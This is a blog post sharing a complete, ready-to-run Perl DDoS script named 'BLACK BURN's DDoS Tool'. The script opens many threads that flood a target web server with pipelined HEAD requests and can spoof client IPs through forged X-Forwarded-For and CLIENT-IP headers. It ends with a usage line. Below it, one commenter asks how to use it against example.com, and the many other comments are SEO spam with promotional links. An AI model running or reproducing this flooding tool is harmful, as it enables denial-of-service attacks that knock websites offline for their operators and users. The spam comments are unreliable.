BLACK BURN's DDoS Tool
#!/usr/bin/perl
package control;
my $ip;
sub new {
my ($class,$i) = @_;
$ip = $i;
my $self={};
$ip = $i;
bless $self, $class;
return $self;
}
sub mas {
my ($self,$veces) = @_;
$veces = 1 if($veces eq "");
my ($a,$e,$o,$b) = split(/\./,$ip);
for($as=0;$as<$veces;$as++) {
$b++;
if($b>=255) {$b=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
die("No mas IPs!\n") if($a>=255);
}
$ip = join "",$a,".",$e,".",$o,".",$b;
return $ip;
}
1;
package main;
use Socket;
use IO::Socket::INET;
use threads ('yield',
'exit' => 'threads_only',
'stringify');
use threads::shared;
my $ua = "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0";
my $method = "HEAD";
my $hilo;
my @vals = ('a','b','c','d','e','f','g','h','i','j','k','l','n','o','p','q','r','s','t','u','w','x','y','z',0,1,2,3,4,5,6,7,8,9);
my $randsemilla = "";
for($i = 0; $i < 30; $i++) {
$randsemilla .= $vals[int(rand($#vals))];
}
sub socker {
my ($remote,$port) = @_;
my ($iaddr, $paddr, $proto);
$iaddr = inet_aton($remote) || return false;
$paddr = sockaddr_in($port, $iaddr) || return false;
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) || return false;
return SOCK;
}
sub sender {
my ($max,$puerto,$host,$file) = @_;
my $sock;
while(true) {
my $paquete = "";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $puerto, Proto => 'tcp');
unless($sock) {
print "\n[x] Unable to connect...\n\n";
sleep(1);
next;
}
for($i=0;$i<$porconexion;$i++) {
$ipinicial = $sumador->mas();
my $filepath = $file;
$filepath =~ s/(\{mn\-fakeip\})/$ipinicial/g;
$paquete .= join "",$method," /",$filepath," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nCLIENT-IP: ",$ipinicial,"\r\nX-Forwarded-For: ",$ipinicial,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
}
$paquete =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
print $sock $paquete;
}
}
sub sender2 {
my ($puerto,$host,$paquete) = @_;
my $sock;
my $sumador :shared;
while(true) {
$sock = &socker($host,$puerto);
unless($sock) {
print "\n[x] Unable to connect...\n\n";
next;
}
print $sock $paquete;
}
}
sub comenzar {
$SIG{'KILL'} = sub { print "Killed...\n"; threads->exit(); };
$url = $ARGV[0];
print "URL: ".$url."\n";
$max = $ARGV[1];
$porconexion = $ARGV[2];
$ipfake = $ARGV[3];
if($porconexion < 1) {
print "[-]Invalid arg 3...\n";
exit;
}
if($url !~ /^http:\/\//) {
die("[x] Invalid URL!\n");
}
$url .= "/" if($url =~ /^http?:\/\/([\d\w\:\.-]*)$/);
($host,$file) = ($url =~ /^http?:\/\/(.*?)\/(.*)/);
$puerto = 80;
($host,$puerto) = ($host =~ /(.*?):(.*)/) if($host =~ /(.*?):(.*)/);
$file =~ s/\s/ /g;
print join "","[!] Launching ",$max," threads!\n";
$file = "/".$file if($file !~ /^\//);
print join "","Target: ",$host,":",$puerto,"\nPath: ",$file,"\n\n";
# entonces toca un paquete unico, no tiene caso que se genere por cada hilo :)...
if($ipfake eq "") {
# envio repetitivo
my $paquetebase = join "",$method," /",$file," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
$paquetesender = "";
$paquetesender = $paquetebase x $porconexion;
$paquetesender =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender2', ($puerto,$host,$paquetesender));
}
} else {
# envio con ip...
$sumador = control->new($ipfake);
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender', ($porconexion,$puerto,$host,$file));
}
}
print "[-] Launched!\n";
for($v=0;$v<$max;$v++) {
if ($thr[$v]->is_running()) {
sleep(3);
$v--;
}
}
print "Fin!\n";
}
if($#ARGV > 2) {
comenzar();
} else {
die("Use: script.pl [url] [Connections] [Requests per connection] [Initial false IP (optional)]\n");
}
Please tell us more about usage with example.com
ReplyDeleteΙ thinκ that what you typed mаde a bunch off senѕe.
ReplyDeleteBut, wwhat abοut this? what if yoou adԁed a little contеnt?
I ain't suggesting yоur content is not solіd.,
but what if уou added a heaԁline that grabbеd people's attention?
I mean "PerL DDos Script (Save As : ".pl"" iѕ kinda plain.
Υou should glance at Yаhoo's home page and note hoω they write post titles to get pеople to open
the links. You might try аdding a vіdeo or a related
pic or two to grаb readerѕ interested about
what you've written. Just my opіnіon, іt could brіng your poѕts a little livеlier.
my site: spodnie jeansowe
naic man :$
ReplyDeleteDisadvantages: Webkinz has a pressure element to keep
ReplyDeletekids coming back often. Employing the pre-approval setting will protect
you from this peril. (At this point, you can determine whether your pony will have a shorter mane, like a traditional hunter-jumper, or a long and luxurious
one, like a Baroque horse.
my site wizard world ()
Fortunately, you can simplify this task by reading some reviews and articles on mmorpgs.
ReplyDeleteYou can buy the furniture and clothes and are given prime importance when it comes to
inclusion of new features. When logging into Club Penguin,
if you see many lines for a server that means there are lots of penguins on it.
Also visit my blog ... install wizard - ,
Invite them to become your buddy and throw a party at each other's house in Disney style.
ReplyDeleteThis site was put together by the Internet Keep Safe Coalition.
Zero spam - only approved senders can send emails
to your children.
Have a look at my website ... how to hack csr racing no jailbreak ()
I've included a link to a great list of cheats but if you type Club
ReplyDeletePenguin or cheats into the search bar you will come back with
thread after thread of people offering tips and tricks to
help you advance in the game. Although your friend may find the comment
hilarious, your prospective employer, teacher, youth group leader, or
in-laws may not. On e more important feature of Club Penguin field ops is the club penguin tracker.
My web site :: wartune hack 2013 ()
Easy to learn games that help your kid improve hand-eye coordination and practice problem solving and
ReplyDeletestrategy abound, with themes that range from gold mining to fireworks and beyond.
You can catch such postings before they are made public.
For example, users can get banned for 24 hours if they
swear or write inappropriate text or remarks during actual game play.
Also visit my website: wizard101 crown generator free download - ,
Whether you like it or not, and whether you agree philosophically with the idea,
ReplyDeletethese folks are at liberty to look at anything you post online.
This site was put together by the Internet Keep Safe Coalition.
As always, if you want the entire benefits of Club Penguin,
you would have to pay real money to get those extra benefits for your penguin.
Feel free to visit my homepage ... skylanders giants cheats ()
Keeping them safe while they are using the net is always an issue.
ReplyDeleteAlthough your friend may find the comment hilarious, your prospective employer, teacher, youth group leader, or
in-laws may not. Zero spam - only approved senders can send emails to your children.
Feel free to surf to my web site: world of tanks cheats for gold ()
Fortunately, you can simplify this task by reading some reviews and articles on mmorpgs.
ReplyDeleteRockhopper has his faithful companion, Yarr, a
red puffle who travels the on the Migrator with Rockhopper.
(At this point, you can determine whether your pony will have a shorter mane, like a traditional hunter-jumper,
or a long and luxurious one, like a Baroque horse.
Check out my webpage: world of tanks hack tool ()
Whether you like it or not, and whether you agree philosophically with the idea, these folks are at liberty to look at anything you post
ReplyDeleteonline. Employing the pre-approval setting will protect you from this peril.
For example, users can get banned for 24 hours if they swear or write inappropriate text or remarks during actual
game play.
Look into my web site: game hacker; ,
Invite them to become your buddy and throw a party at each other's
ReplyDeletehouse in Disney style. This site was put together by the Internet Keep Safe Coalition.
On e more important feature of Club Penguin field ops is the club penguin tracker.
My site: hacking, ,
For more details please visit our site to club
ReplyDeletepenguin field ops or Click here. You can catch such postings before they are made public.
Kaboose - - A fun website focused on providing games
"for moms and kids".
Here is my homepage club penguin cheats ()
Disadvantages: Webkinz has a pressure element to keep kids coming
ReplyDeleteback often. Rockhopper has his faithful companion, Yarr, a red puffle who travels the on the Migrator
with Rockhopper. This basic guide to kids' games online for free will help you
discover the right games for your kid.
Feel free to visit my web site trucos de left 4 dead 2 xbox 360 trucoteca
()
Easy to learn games that help your kid improve hand-eye
ReplyDeletecoordination and practice problem solving and strategy abound, with
themes that range from gold mining to fireworks
and beyond. Although your friend may find the comment hilarious, your prospective employer, teacher, youth group
leader, or in-laws may not. As always, if you want the entire benefits of Club
Penguin, you would have to pay real money to get those extra benefits for your penguin.
Take a look at my webpage: webpage - ,
Way cool! Some extremely valid points! I appreciate you
ReplyDeletepenning this post and the rest of the site is also very good.
Feel free to visit my web page: Las Vegas Frigidaire Service
Outstanding post but I was wanting to know if you could
ReplyDeletewrite a litte more on this topic? I'd be very thankful if you could
elaborate a little bit further. Many thanks!
Feel free to visit my homepage how to get a new car key
I all the time emailed this web site post page to all my associates, for the reason that if like to read it after that my
ReplyDeletecontacts will too.
my webpage :: Yard Pest Control Surrey BC
Thanks for sharing such a good thinking, article is fastidious,
ReplyDeletethats why i have read it fully
Here is my page; making money at home
Can you tell us more about this? I'd care to find out more details.
ReplyDeleteFeel free to visit my web-site ... new hampshire business
Hey! This post could not be written any better!
ReplyDeleteReading this post reminds me of my good old room
mate! He always kept chatting about this. I will forward this post to
him. Fairly certain he will have a good read. Thanks for sharing!
Check out my page - http://rentaserp.com rent-a-serp best bonus
Howdy, i read your blog occasionally and i own a similar one and i was just curious
ReplyDeleteif you get a lot of spam remarks? If so how do you reduce it, any plugin or anything
you can suggest? I get so much lately it's driving
me insane so any assistance is very much appreciated.
Also visit my blog - tooth implant cost in austin
I blog often and I really thank you for your content.
ReplyDeleteThis article has really peaked my interest. I will book mark your blog and
keep checking for new information about once per week.
I opted in for your Feed too.
Here is my blog post :: credit card companies
Hey, just wanted to give you a quick notice and assist you to find out that numerous
ReplyDeleteillustrations or photos are not operating properly on this website.
I have no idea how nonetheless I assume
it can be a linking factor. I actually have even trfied it in two various
web browsers and both give an identical end result.
My page: brother ls 2125 sewing machine reviews [www.picrclinic.com]
Oh my goodness! Awesome article dude! Many thanks, However I am going through problems with your RSS.
ReplyDeleteI don't know the reason why I can't join it.
Is there anybody else having the same RSS problems?
Anyone that knows the answer can you kindly respond? Thanks!!
Feel free to surf to my webpage ... DISH Network family package
Greetings! This really is somewhat off topic nonetheless I might
ReplyDeleteneed some the aid of an experienced author.
Would you say that it is actually challenging to make a personal blog site?
I'm not reaally extremely techhincal however, Icould possibly figure components out reasonably quick.
I happen to be fascinated about putting together my very own,
despite the fact that I have been not sure where to start.
Might you have any advice or suggestions?
Many thanks….! Should you use Twitter? I would like to
follow you if it will be okay. I have really valued
your blog site and loiok forward to any additional
posts.
Here is my blog post - best portable old sewing machine Brands
Fantastic items from you, man. I've bear in mind
ReplyDeleteyour stuff previous to and you are simply extremely excellent.
I actually like what you've obtained here, certainly like what
you are stating and the way by which you are saying it. You are making
it entertaining and you still take care of to stay it wise.
I can't wait to learn far more from you. This is actually a terrific website.
Review my web site - canned air for computers
You're so interesting! I don't think I've truly read a single thing like that before.
ReplyDeleteSo great to discover someone with a few original thoughts on this
issue. Really.. many thanks for starting this up.
This web site is something that is needed on the web, someone with a bit of originality!
my blog ... tub resurfacing Dallas
My brother suggested I might like this blog. He was totally right.
ReplyDeleteThis post truly made my day. You can not imagine just how much time I had spent for this information! Thanks!
Also visit my webpage :: lasik eye surgery michigan
What a stuff of un-ambiguity and preserveness of precious experience concerning unpredicted feelings.
ReplyDeleteAlso visit my site ... united states public adjusters
I have been exploring for a little bit for any high quality
ReplyDeletearticles or weblog posts in this sort of house .
Exploring in Yahoo I ultimately stumbled upon this web site.
Reading this info So i'm satisfied to convey that I've a
very excellent uncanny feeling I came upon just what I needed.
I such a lot without a doubt will make certain to
do not omit this site and provides it a glance on a continuing basis.
my page: auto locksmith houston
I am really impressed with your writing talents and also with the
ReplyDeleteformat on your blog. Is that this a paid theme or did you
modify it your self? Either way stay up the excellent quality writing, it is uncommon to look
a nice weblog like this one these days..
Also visit my web-site :: working at home online
This design is steller! You most certainly
ReplyDeleteknow how to keep a reader entertained. Between your wit and your
videos, I was almost moved to start my own blog (well, almost...HaHa!) Wonderful
job. I really enjoyed what you had to say, and more
than that, how you presented it. Too cool!
my web blog buy instagram followers
I have been browsing online more than 2 hours today, yet I never found any interesting article
ReplyDeletelike yours. It is pretty worth enough for me.
In my opinion, if all webmasters and bloggers made good content
as you did, the internet will be much more useful than ever before.
My web-site :: how to make money at home for real
I savor, lead to I found just what I used to be looking for.
ReplyDeleteYou have ended my 4 day long hunt! God Bless you man. Have a great day.
Bye
Here is my blog post: gold ira 401k rollover
Howdy terrific website! Does running a blog like this require
ReplyDeletea lot of work? I've absolutely no knowledge of programming
but I had been hoping to start my own blog soon. Anyhow,
if you have any suggestions or techniques for new blog owners please share.
I know this is off subject nevertheless I simply needed to
ask. Appreciate it!
my web page make good money from home
Thanks to my father who stated to me on the topic of this blog,
ReplyDeletethis website is really remarkable.
Visit my web blog - wireless video camera
Highly energetic article, I liked that bit. Will there be a part 2?
ReplyDeleteFeel free to visit my weblog quotes for
relationships - -
Magnificent beat ! I would like to apprentice while you amend your web
ReplyDeletesite, how can i subscribe for a blog web site? The account
helped me a acceptable deal. I had been a little bit acquainted of
this your broadcast offered bright clear idea
Look at my blog ... ingreso cybernetico comp plan
Great goods from you, man. I have understand your stuff previous
ReplyDeleteto and you are just extremely wonderful. I actually like what you've acquired here, certainly like what
you're stating and the way in which you say it.
You make it entertaining and you still take care of to keep it smart.
I cant wait to read much more from you. This is actually a
great website.
Feel free to surf to my web-site ... causes of panic attacks
e cigarette health, smokeless cigarettes, electronic cigarettes, electronic cigarette reviews, electronic cigarettes, e cigarette
ReplyDeleteMs fratioare !
ReplyDeletewant to have chat in Pakistani Chat Rooms ?
ReplyDeletethen you should join our yahoo chat rooms